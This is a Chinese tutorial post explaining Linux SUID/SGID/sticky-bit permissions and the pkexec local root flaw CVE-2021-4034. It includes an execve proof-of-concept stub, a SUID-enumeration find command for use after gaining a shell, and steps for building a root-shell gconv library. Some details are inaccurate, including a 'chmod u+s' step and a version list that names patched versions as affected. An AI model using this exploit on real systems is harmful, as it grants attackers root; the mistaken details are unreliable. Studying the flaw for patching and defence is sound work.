前言

本篇文章主要叙述CVE-2021-4034漏洞该漏洞影响的linux发行版众多例如Ubuntu、CentOS、Debian等等该漏洞为Linux系统本地提权漏洞利用脚本已经公开利用简单且稳定脚本地址Github

当攻击者获取目标系统普通用户权限时利用该脚本即可直接获得root权限该漏洞的主要原因是因为polkit中的pkexec程序对参数个数判断不佳导致数组溢出具体分析过程将在下面慢慢介绍。首先得先了解下suid、sgid、sbit的特殊权限将对后面分析起到帮助也对后续的渗透学习开辟一些新鲜道路。

一、SUID、SGID、SBIT的介绍

suid、sgid、sbit是文件权限管理的特殊命令基本的Linux权限为9个分别为rwx rwx rwx利用命令ll -a 加文件路径会发现有一些特殊的权限位符号。例如

这里有一个特殊权限位s
Linux有十二个权限符

属主	属组	其他人	用户位	用户组	其他用户
rwx	rwx	rwx	suid	sgid	sbit

1. SUID的基本权限位有x权限标识符为s代表数字为4生效对象为用户位
2. SGID的基本权限位有x权限标识符为s代表数字为2生肖对象为用户组位
3. SBIT的基本权限位有x权限标识符为t代表数字为1生效对象为其他用户

1SUID权限位

1. suid通过s字符标识判定当s出现在文件所有者的x权限时如上图/usr/bin/passwd文件状态位-rwsr-xr-x此时就可以判定为时suid。
2. suid权限仅对二进制程序有效
3. 该权限仅在执行该程序的过程中有效
4. 执行者将拥有该程序拥有者的权限

SUID的目的为了让本来没有相应权限的用户运行这个程序可以短暂的享有该程序拥有者的权限。就比如上方图例/usr/bin/passwd该二进制程序是用来修改密码的但是linux系统中用户众多有root、普通用户等等这些用户都需要在特殊情况修改密码比如在忘记登录密码时。

具体流程

1. 因为passwd的权限对任何用户都是可执行的所以系统中不管什么用户都可执行
2. passwd文件的拥有者是属于root
3. 当普通用户在执行passwd命令时会在执行期间短暂拥有root权限
4. 普通用户借助root权限修改了/etc/shadow文件
5. 最后把密码修改成功
6. 这时候在攻击者的角度就可以利用此类拥有者为root的二进制程序提权成功

• 注当在渗透过程中获取了shell可以使用find命令查询系统上所有的s权限位文件命令
  find / -perm -4000 -type f -ls

参数解释
-perm利用权限进制搜索
-type指定文件类型l软连接类型d文件夹类型f文件类型
-ls搜索的数据进行格式化输出
-delete对匹配的数据进行删除

2SGID权限位

1. sgid和suid差不多先查看s是否在所属用户组的x位置上如果在那就是sgid
2. sgid获得该程序所属用户组的权限
3. sgid仅对二进制程序有用
4. sgid主要用在目录上

• 注sgid如果用户在此目录下具有w写的权限的话若使用者在此目录下建立新文件则新文件的群组与此目录的群组相同。

3SBIT权限位

1. sbit主要针对other来设置的和suidsgid大同小异只是功能上不同而已
2. sbit只对目录有效当用户在该目录下新建文件或目录时仅自己和root才有权利删除
3. 最具代表的就是/tmp目录之前在渗透项目中获得了webshell都要先进到/tmp目录下进行一系列下载之类的操作因为/tmp目录任何人都可以增加、修改文件权限为rwx

• 注SBIT对文件不起作用

总结

符号类型改变权限	数字类型改变档案权限	用 ls -l 来查看
1. chmod u+s test-- 为test文件加上setuid标志	setuid位, 如果该位为1, 则表示设置setuid 4- - -	rwsrw-r-- 表示有setuid标志
2.chmod g+s test-- 为test目录加上setgid标志	setgid位, 如果该位为1, 则表示设置setgid 2—	rwxrwsrw- 表示有setgid标志
3.chmod o+t test-- 为test目录加上sticky标志	sticky位, 如果该位为1, 则表示设置sticky 1—	rwxrw-rwt 表示有sticky标志

二、CVE-2021-4034

• 这里是学习了看雪论坛的某位大佬对该漏洞的整体分析然后自己理解进行叙述实例也是该大佬的例子。

1相关知识

1、实例代码

#include<stdio.h>
int main(int argc, char** argv){
	printf("argc:%d\n", argc);
	for(int i;i<argc;i++){
		printf("%s\n",argv[i]);
	}
	return 0;
}

• 上述代码中argc是参数个数argv是存放的具体参数argv[0]—>程序本身argv[1]—>第一个参数argv[2]—>第二个参数argv[argc]0表示结束。
  
• 当执行程序时argc的取值至少为1因为即使不加参数argv[0]也要指向程序路径本身。pkexec在特殊情况下如使用execve来调用程序并给argv传值 NULL则argc为0。
• execve函数

#include<unistd.h>
int execve(const char *pathname, char *const argv[], char *const envp[]);

• execve.c:

#include<unistd.h>
int main(int argc, char **argv){
	return execve("./test", NULL, NULL);
}

• 注argv和envp在内存中的分布是连续的。
• execve.c:

#include<unistd.h>
int main(){
	char* const argv[] = {
		"AAAAAA1111",
		"AAAAAA1111",
		"AAAAAA1111",
		NULL
	};
	char* const envp[] = {
		"AAAAAA1111",
		"AAAAAA1111",
		"AAAAAA1111",
		NULL
	};
	return execve("./test", argv, envp);
}

• 利用execve调用test将上述三个值分别传入argv和envp中

#include<stdio.h>
int main(int argc, char** argv)
{
    printf("argc: %d\n", argc);
    for(int i; i<8; i++) {
        if(argv[i]!=NULL) {
            printf("argv[%d]: %s\n", i, argv[i]);
        } else {
            printf("argv[%d]: NULL\n", i);
        }
    }
 
    return 0;
}

• argc为3加上截止符0argv的大小为4这里直接打印了8个值显然是越界了通过实例表明argv与envp在内存布局上是连续的envp紧跟argv之后。

具体分析过程请参考本文最后大佬分析的特别完善受益匪浅

2漏洞原理

本漏洞主要被利用的包括以下几点

1. pkexec为suid程序
2. 当argc为0时pkexec会读取argv[1]变量而由于刚才实例分析内存布局是连续的因此实际上会读取到第一个环境变量。
3. 读取到argv[1]之后若其不是绝对路径则pkexec会将其理解为相对路径会在环境变量中查找PATH变量将其转换为实际路径。
4. 若PATH环境变量包含一个攻击者可控的路径则pkexec转换后的实际路径将会是这个攻击者可控的路径下的一个子目录则显然此实际路径也是攻击者可控的。例如/bin/sh 、 PATH=/bin:/usr/bin
5. pkexec会对argv[1]赋值将其修改为上述得到的实际路径但是argv[1]此时实际上指向的是pkexec的第一个环境变量也就是说pkexec将自己的第一个环境变量修改为这个实际路径了。
6. pkexec会在程序运行过程中调用g_printerr函数这个函数会在运行的时候按需载入GCONV_PATH环境变量指向的路径下的gconv-modules文件中写明的外部动态链接库so并运行其中的初始化函数gconv_init。

攻击者可以做以下操作提升至root权限

#include <unistd.h>

int main(int argc, char **argv)
{
	char * const args[] = {
		NULL
	};
	char * const environ[] = {
		"pwnkit.so:.",
		"PATH=GCONV_PATH=.",
		"SHELL=/lol/i/do/not/exists",
		"CHARSET=PWNKIT",
		"GIO_USE_VFS=",
		NULL
	};
	return execve("/usr/bin/pkexec", args, environ);
}

• 这是CVE-2021-4034的poc将其复制到目标机器/tmp目录下编译运行赋权chmod u+s然后执行即可利用suid特殊权限获得root权限。

或者可以

• 在自己可控的目录下生成一个gconv-modules文件并将文件内容设置为指向某个so文件。
• 在so文件中实现gconv_init函数此函数主要就是生成一个root shell由于pkexec默认开启SUID而在so库的此函数中设置当前进程用户的uid为0即可提权到root用户。
• 调用pkexec而且在调用的时候通过命令行参数设置使得pkexec得到的argc为0将环境变量中的第一个设置为非/开头的一个相对路径将环境变量中的PATH变量的值设置为GCONV_PATH=开头的字符串使得对应的路径指向上述存储gconv-modules文件的路径。

3影响版本

主要有pkexec版本为0.105之前

• Ubuntu 20.04 LTSpolicykit-1 - 0.105-26ubuntu1.2
• Ubuntu 18.04 LTSpolicykit-1 - 0.105-20ubuntu0.18.04.6
• Ubuntu 16.04 ESMpolicykit-1 - 0.105-14.1ubuntu0.5+esm1
• Ubuntu 14.04 ESMpolicykit-1 - 0.105-4ubuntu3.14.04.6+esm1
• CentOS 6polkit-0.96-11.el6_10.2
• CentOS 7polkit-0.112-26.el7_9.1

三、修复

目前各大linux发行版都给出了安全补丁升级即可修复该漏洞。

漏洞参考https://bbs.pediy.com/thread-271423.htm#msg_header_h2_6